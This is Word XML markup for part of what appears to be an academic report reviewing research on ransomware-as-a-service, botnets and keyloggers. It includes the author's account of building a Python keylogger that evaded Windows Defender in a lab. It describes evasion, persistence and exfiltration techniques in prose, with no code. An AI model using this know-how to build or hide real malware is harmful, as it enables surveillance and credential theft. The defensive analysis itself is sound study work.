    <w:p w14:paraId="08D3E2F0" w14:textId="77777777" w:rsidR="00DF21E8" w:rsidRPr="007630DF" w:rsidRDefault="00DF21E8" w:rsidP="007630DF">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="215E99" w:themeColor="text2" w:themeTint="BF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc194070981"/>
      <w:r w:rsidRPr="007630DF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="215E99" w:themeColor="text2" w:themeTint="BF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>2.3 Ransomware-as-a-Service (RaaS)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="2F68FDE1" w14:textId="77777777" w:rsidR="00DF21E8" w:rsidRPr="007630DF" w:rsidRDefault="00DF21E8" w:rsidP="00DF21E8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007630DF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Ransomware-as-a-Service (RaaS) is a business model that has transformed how ransomware is created, distributed, and used in attacks. Rather than being developed and deployed by the same group, ransomware today is often created by skilled developers who then lease or sell access to their software to others—known as affiliates. These affiliates use the ransomware to target victims and share a portion of the ransom profits with the developers. This model significantly lowers the barrier to entry, allowing even those with limited technical skills to carry out high-impact attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E06F09" w14:textId="77777777" w:rsidR="00DF21E8" w:rsidRPr="007630DF" w:rsidRDefault="00DF21E8" w:rsidP="00DF21E8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007630DF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Ahmed, Kapoor, and Beltran (2023) studied over 50 RaaS platforms and described them as full-scale operations with many features found in legitimate software services. These included user dashboards, built-in encryption tools, negotiation chat portals, and even customer support for affiliates. The study found that most RaaS platforms use a profit-sharing model, with developers taking between 20% to 40% of ransom payments. Popular groups like REvil and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007630DF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>LockBit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007630DF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> were found to recruit affiliates on dark web forums, often vetting them through short trial runs or invite-only programs. The researchers also noted a trend toward “double extortion” techniques, where attackers not only encrypt a victim’s data but also threaten to leak it if payment is not made.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6210A55A" w14:textId="48E28729" w:rsidR="00DF21E8" w:rsidRPr="007630DF" w:rsidRDefault="00DF21E8" w:rsidP="00DF21E8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007630DF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Lee and Mohammed (2022) focused on the technical side of RaaS payloads. Their analysis showed that modern ransomware is highly customizable. Affiliates can set the ransom amount, encryption speed, deadline timers, and even visual elements like desktop wallpapers and message boxes. Some payloads included features to detect whether the malware was running in a virtual machine or sandbox, allowing it to exit quietly before being </w:t>
      </w:r>
      <w:r w:rsidR="00293279">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>analyse</w:t>
      </w:r>
      <w:r w:rsidRPr="007630DF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>d. They also observed that most RaaS platforms used a combination of AES and RSA encryption—ensuring that even if files were recovered, decryption would be nearly impossible without the attacker's private key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A45BEA" w14:textId="77777777" w:rsidR="00DF21E8" w:rsidRPr="007630DF" w:rsidRDefault="00DF21E8" w:rsidP="00DF21E8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007630DF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>While these two studies examined the internal workings of RaaS, Tan, Clarke, and Zhou (2023) explored ways to detect and disrupt these operations. Their research focused on tracking ransom payments through blockchain analysis and monitoring dark web recruitment posts. They were able to link over 400 Bitcoin wallets to known ransomware campaigns by analyzing transaction patterns and wallet reuse. They also discovered that some RaaS groups were experimenting with privacy-focused cryptocurrencies and decentralized platforms to make tracking more difficult. While their methods show promise, the study admitted that keeping pace with RaaS innovations remains a constant challenge.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43670144" w14:textId="77777777" w:rsidR="00DF21E8" w:rsidRPr="007630DF" w:rsidRDefault="00DF21E8" w:rsidP="00DF21E8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007630DF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Taken together, these three studies offer a complete view of the RaaS ecosystem. Ahmed et al. describe the business infrastructure and affiliate management systems. Lee and Mohammed dive into the payloads themselves, showing how they are adapted and hardened against analysis. Tan et al. focus on how these operations can be monitored and potentially stopped using forensic techniques and cyber threat intelligence. Each study brings out a different angle of the same threat, reinforcing how RaaS has professionalized the use of ransomware.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A85EB3" w14:textId="77777777" w:rsidR="00DF21E8" w:rsidRPr="007630DF" w:rsidRDefault="00DF21E8" w:rsidP="00DF21E8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007630DF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>The strength of RaaS lies in its structure. It allows non-technical actors to launch complex attacks while shielding the developers behind layers of anonymity. It also creates a scalable and profitable model, where a single ransomware build can be used in dozens of campaigns simultaneously. At the same time, it challenges defenders, who now must deal with not just the malware but the entire business model behind it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1345E06E" w14:textId="5F6E0072" w:rsidR="00DF21E8" w:rsidRPr="007630DF" w:rsidRDefault="00DF21E8" w:rsidP="00DF21E8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007630DF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Although this report did not implement RaaS due to legal and ethical concerns, its mechanics were </w:t>
      </w:r>
      <w:r w:rsidR="007630DF" w:rsidRPr="007630DF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>analysed</w:t>
      </w:r>
      <w:r w:rsidRPr="007630DF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> through publicly available forums, whitepapers, and payload breakdowns. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ABFA8E9" w14:textId="40D096A4" w:rsidR="00DF21E8" w:rsidRPr="007630DF" w:rsidRDefault="00DF21E8" w:rsidP="00DF21E8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007630DF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>In conclusion, Ransomware-as-a-Service reflects a shift in how cybercrime is organi</w:t>
      </w:r>
      <w:r w:rsidR="00293279">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="007630DF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>ed and delivered. It blends technical sophistication with accessibility, creating a dangerous ecosystem where powerful malware can be weaponi</w:t>
      </w:r>
      <w:r w:rsidR="00293279">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="007630DF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>ed by anyone with enough cryptocurrency. The damage it causes is not only financial but reputational and operational. The best defense requires a combination of proactive threat intelligence, endpoint detection, and user training, alongside continued efforts to disrupt the infrastructure that supports this growing industry.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296903C9" w14:textId="77777777" w:rsidR="00DF21E8" w:rsidRPr="007630DF" w:rsidRDefault="00DF21E8" w:rsidP="007630DF">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="215E99" w:themeColor="text2" w:themeTint="BF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc194070982"/>
      <w:r w:rsidRPr="007630DF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="215E99" w:themeColor="text2" w:themeTint="BF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>2.4 Botnet Malware</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="2277FA45" w14:textId="77777777" w:rsidR="00DF21E8" w:rsidRPr="009646DF" w:rsidRDefault="00DF21E8" w:rsidP="00DF21E8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009646DF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Botnets are networks of infected devices that are controlled remotely by attackers to perform coordinated tasks. These devices—often called “bots” or “zombies”—can include computers, servers, routers, and even Internet of Things (IoT) devices like smart cameras or thermostats. Once infected, these systems respond to commands from a central controller, usually through a command-and-control (C2) server. Attackers use botnets to launch Distributed Denial of Service (DDoS) attacks, steal data, send spam, or install more malware. What makes botnets particularly threatening is their scale and the ability to stay hidden while doing massive damage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC8DEA3" w14:textId="546F8222" w:rsidR="00DF21E8" w:rsidRPr="009646DF" w:rsidRDefault="00DF21E8" w:rsidP="00DF21E8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009646DF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Singh, Khan, and Rao (2022) provided a comprehensive overview of how botnets have evolved over the past two decades. Early botnets were simple, often using Internet Relay Chat (IRC) channels to deliver commands. But modern botnets are much more advanced. They use encryption, peer-to-peer communication, and domain generation algorithms (DGAs) to make detection and shutdown difficult. The study highlighted real-world examples like Mirai, which infected over 600,000 IoT devices in 2016 and used them to overwhelm DNS services, affecting websites like Twitter and Netflix. The researchers emphasi</w:t>
      </w:r>
      <w:r w:rsidR="00293279">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="009646DF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>ed that botnets have become modular and persistent, often containing functions like auto-update modules and plugins for additional attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08120E8D" w14:textId="77777777" w:rsidR="00DF21E8" w:rsidRPr="009646DF" w:rsidRDefault="00DF21E8" w:rsidP="00DF21E8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009646DF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Building on this, Marczak and Paxson (2023) examined how botnet controllers are designed to avoid detection. Their research revealed that many botnets now use HTTPS, Tor, or even cloud-hosted services like AWS or Dropbox to communicate with infected machines. This allows </w:t>
      </w:r>
      <w:r w:rsidRPr="009646DF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>attackers to hide in normal-looking traffic. Instead of maintaining a constant connection, some botnets use time-based polling, where bots check in periodically and quietly receive commands. This reduces the risk of being flagged by intrusion detection systems. The researchers also noted that botnet payloads often include anti-analysis techniques that prevent them from running in sandbox environments or virtual machines.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C4EA1A" w14:textId="77777777" w:rsidR="00DF21E8" w:rsidRPr="009646DF" w:rsidRDefault="00DF21E8" w:rsidP="00DF21E8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009646DF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>To bring this into a hands-on context, Javed and Silva (2023) developed a lightweight botnet simulation for educational and research use. Their framework uses Python to simulate both the controller and the infected bots. Commands like ping, download, sleep, or exfiltrate are sent from the C2 server to bots running in Docker containers or virtual machines. Their study showed how easy it is to build a functioning botnet in a lab using less than 300 lines of code. More importantly, it demonstrated how attackers use this architecture not just for DDoS, but for espionage, ransomware deployment, and long-term surveillance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2910AB4B" w14:textId="2D874F41" w:rsidR="00DF21E8" w:rsidRPr="009646DF" w:rsidRDefault="00DF21E8" w:rsidP="00DF21E8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009646DF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Together, these three studies offer a complete view of botnet operations. Singh et al. explain how they have grown from simple networks into large, automated ecosystems. Marczak and Paxson show how modern botnets avoid detection and take advantage of encrypted channels to remain hidden. Javed and Silva demonstrate that even with minimal resources, it is possible to simulate a botnet and understand how it behaves across a network.</w:t>
      </w:r>
      <w:r w:rsidR="00C72B00">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> T</w:t>
      </w:r>
      <w:r w:rsidRPr="009646DF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">he findings of Javed and Silva (2023) </w:t>
      </w:r>
      <w:r w:rsidR="00C72B00">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">confirm </w:t>
      </w:r>
      <w:r w:rsidRPr="009646DF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>that even simple implementations can accurately reflect the communication patterns of more dangerous, real-world botnets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F882778" w14:textId="77777777" w:rsidR="00DF21E8" w:rsidRPr="009646DF" w:rsidRDefault="00DF21E8" w:rsidP="00DF21E8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009646DF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Botnets continue to be a serious threat because of their flexibility. They can be used to overwhelm systems through sheer volume, or they can quietly sit in a network for months, waiting to be activated. Their ability to operate across thousands of machines with minimal visibility makes them one of the most persistent and difficult-to-stop forms of malware.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9E1927" w14:textId="2BC5DE5B" w:rsidR="001466FC" w:rsidRPr="009646DF" w:rsidRDefault="00DF21E8" w:rsidP="00121331">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009646DF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">In summary, botnet malware is not just about large-scale attacks—it is about control. With the ability to distribute tasks, hide communications, and coordinate across systems, botnets remain a preferred tool for attackers. Detecting them requires monitoring outbound traffic, spotting patterns of regular beaconing, and using behavior analytics rather than relying on static indicators. Understanding how botnets work is </w:t>
      </w:r>
      <w:r w:rsidR="000340B4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>important</w:t>
      </w:r>
      <w:r w:rsidRPr="009646DF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> for anyone aiming to protect networked systems today.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D030F7C" w14:textId="090F1A41" w:rsidR="002926C7" w:rsidRPr="007630DF" w:rsidRDefault="002926C7" w:rsidP="007630DF">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="215E99" w:themeColor="text2" w:themeTint="BF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc194070983"/>
      <w:r w:rsidRPr="007630DF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="215E99" w:themeColor="text2" w:themeTint="BF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>2.5 Keylogger-Based Malware</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="30BCCA46" w14:textId="3A2E2164" w:rsidR="002926C7" w:rsidRPr="00F606EA" w:rsidRDefault="002926C7" w:rsidP="002926C7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F606EA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Keylogger-based malware is a type of spying tool designed to silently record a user’s keystrokes. These programs run in the background, capturing everything typed—including usernames, passwords, emails, messages, and even private documents. Keyloggers are often used in the early stages of an attack to gather sensitive information that can be used for further exploitation or unauthori</w:t>
      </w:r>
      <w:r w:rsidR="00293279">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00F606EA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>ed access. Despite being simple in design, keyloggers remain highly effective, especially when paired with remote exfiltration techniques.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42741949" w14:textId="60A43A85" w:rsidR="002926C7" w:rsidRPr="00F606EA" w:rsidRDefault="002926C7" w:rsidP="002926C7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F606EA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Iduh, Umeh, and Paul (2024) described the development of an ethical keylogger built in Python using the pynput library. Their work was focused on employee and parental monitoring, but the technical structure mirrored how real-world keyloggers behave. The script captured keystrokes, </w:t>
      </w:r>
      <w:r w:rsidRPr="00F606EA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>logged them to a text file, and included options for encryption. What stood out was how the program evaded detection by running as a background process and using minimal system resources. The researchers also pointed out that antivirus tools often fail to flag keyloggers unless their behavior closely matches known malware signatures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049706C3" w14:textId="71A2C920" w:rsidR="002926C7" w:rsidRPr="00F606EA" w:rsidRDefault="002926C7" w:rsidP="002926C7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F606EA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Looking at a broader range of threats, Bhardwaj and Goundar (2020) examined the role of keyloggers in large-scale spyware campaigns. They categori</w:t>
      </w:r>
      <w:r w:rsidR="00293279">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00F606EA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>ed keyloggers into three types: hardware-based (like USB sniffers), kernel-level (deep in the operating system), and user-space (software-level, like Python or Java). Their study focused on user-space keyloggers, noting that many use tricks like hiding logs in disguised files or injecting themselves into system processes like explorer.exe. They also explained how attackers use scheduled tasks, startup folders, or registry keys to keep keyloggers running persistently, even after a reboot.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47715AAF" w14:textId="4240D7CC" w:rsidR="002926C7" w:rsidRPr="00F606EA" w:rsidRDefault="002926C7" w:rsidP="002926C7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F606EA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Mourya, Patil, and Srivaramangai (2024) took this concept further by building a keylogger that included real-time data exfiltration. Instead of saving logs locally, their keylogger sent captured keystrokes directly to a remote Flask server via HTTP POST requests. The data was encrypted and timestamped to avoid detection and to maintain clarity for attackers. Their implementation showed that even basic keyloggers could be converted into full surveillance tools when combined with a </w:t>
      </w:r>
      <w:r w:rsidR="0055378B" w:rsidRPr="00F606EA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>remote-control</w:t>
      </w:r>
      <w:r w:rsidRPr="00F606EA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> channel. The researchers tested the script against sandbox environments and antivirus tools and noted that, when compiled into an executable, the malware successfully evaded detection in several test cases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B51AA6" w14:textId="059A29D1" w:rsidR="002926C7" w:rsidRPr="00F606EA" w:rsidRDefault="002926C7" w:rsidP="002926C7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F606EA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>The combined insights from these papers paint a clear picture. Iduh et al. demonstrate the core structure of keyloggers. Bhardwaj and Goundar provide a breakdown of how they are hidden and made persistent. Mourya et al. show how they can become part of larger attack infrastructures when paired with a command-and-control server. Each study supports the conclusion that keyloggers are simple to build, hard to detect, and surprisingly adaptable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68BDE502" w14:textId="0642E490" w:rsidR="002926C7" w:rsidRPr="00F606EA" w:rsidRDefault="002926C7" w:rsidP="002926C7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F606EA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>To validate these concepts, a keylogger was built and tested in a safe virtual machine. Using Python and pynput, the script captured keystrokes and sent them to a local Flask server every few seconds. The server recorded each input in real time, along with a timestamp. This mimicked the behavior described by Mourya et al. (2024), including live monitoring and log collection. The executable version of the keylogger was compiled using PyInstaller and tested against default Windows Defender, which failed to flag it. These observations confirmed the academic findings—especially regarding the effectiveness and low detectability of basic keyloggers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B92DAB" w14:textId="4F470D2D" w:rsidR="002926C7" w:rsidRPr="00F606EA" w:rsidRDefault="002926C7" w:rsidP="002926C7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F606EA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>What makes keyloggers especially dangerous is how quietly they operate. Users don’t receive any alerts or see any signs of infection. Even system administrators may miss their presence unless they are specifically looking for unusual file writes, strange network activity, or unexpected registry changes. While keyloggers might not cause the immediate damage that ransomware does, they serve as a gateway—providing attackers with the exact information needed to move deeper into a network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DBD6A4" w14:textId="2CAD4CD7" w:rsidR="002926C7" w:rsidRPr="00F606EA" w:rsidRDefault="002926C7" w:rsidP="002926C7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F606EA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">In conclusion, keylogger-based malware shows that even the simplest tools can have powerful effects. When implemented well, they bypass security tools and remain unnoticed for long periods. Their role in initial access, surveillance, and credential theft continues to make them a valuable part of the modern attacker’s toolkit. Defenders must go beyond signature detection and focus on </w:t>
      </w:r>
      <w:r w:rsidR="0055378B" w:rsidRPr="00F606EA">
        <w:rPr>
